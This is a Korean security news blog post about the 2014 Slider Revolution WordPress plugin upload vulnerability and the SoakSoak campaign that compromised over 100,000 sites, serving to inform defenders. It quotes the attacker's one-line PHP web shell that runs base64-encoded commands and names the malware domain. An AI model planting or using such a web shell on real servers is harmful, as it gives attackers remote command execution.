728x90
- 워드프레스의 슬라이더 레볼루션(Slider Revolution) 플러그인에서 발생하는 취약점으로 인해 100,000개의
사이트가 해킹에 영향을 받음 - 워드프레스는 블로깅과 웹 컨텐츠 관리(CMS)를 위해 주로 이용하는 소프트웨어이며 슬라이드를 디자인하기
사용하는 슬라이더 레볼루션 플러그인에서 파일 업로드 취약점이 발견
주요내용
- 워드프레스의 플러그인 형태로 설치되는 슬라이더 레볼루션(RevSlider)에서 웹셀을 업로드할 수 있는 파일
업로드 취약점이 발견
※취약점 : Slider Revolution shell upload exploit
- 취약점은 Simo Ben youssef에 의해 발견(14.10.15.)되었으며, 취약점이 발생하는 관리자 페이지에 접근할 때
별도의 인증이 없으며 업로드 파일에 대한 검증이 부재하여 발생
※ 공격자가 해킹에 사용한 웹셀 코드 : <?php system(base64_decode($_GET[‘cmd’])); ?> - 공격자는 워드프레스가 설치된 취약한 웹 사이트를 스캔한 후 웹셀 업로드를 통해 서버를 장악하고 악성코드
유포 등 추가적인 공격을 수행한 것으로 알려짐
※ 취약점을 통해 악성코드를 유포하는 최초 도메인 이름 : “SoakSoak.ru“ - 보안 업체 Sucuri에 의하면, 100,000개 이상의 워드프레스를 이용하는 사이트가 해당 공격에 노출되어 해킹
되었음을 전함 - 구글은 검색 결과 페이지에 SoakSoak.ru 포함되어 있을 경우 Safe Browsing으로 검색 사이트로의 접근을
차단시킴
[출처]
1. http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522
2. http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html
3. https://www.centrora.com/blog/update-centrora-security-protect-soaksoak-malware/
728x90
'Security_News > 해외보안소식' 카테고리의 다른 글
| 소니 플레이스테이션네트워크 DDoS 공격받아 (0) | 2015.01.05 |
|---|---|
| 英, 암호 교육 앱 개발 등 사이버 보안 양성 전략 발표 (0) | 2014.12.31 |
| 해커들, 암시장에서 고객유치 경쟁 (0) | 2014.12.31 |
| 美 소니 픽처스, 뉴스 매체들에 유출정보에 대한 세부사항 공개 중단 요청 (0) | 2014.12.31 |
| 영국 은행들의 웹 사이트가 변종 POODLE 취약점에 노출 (0) | 2014.12.31 |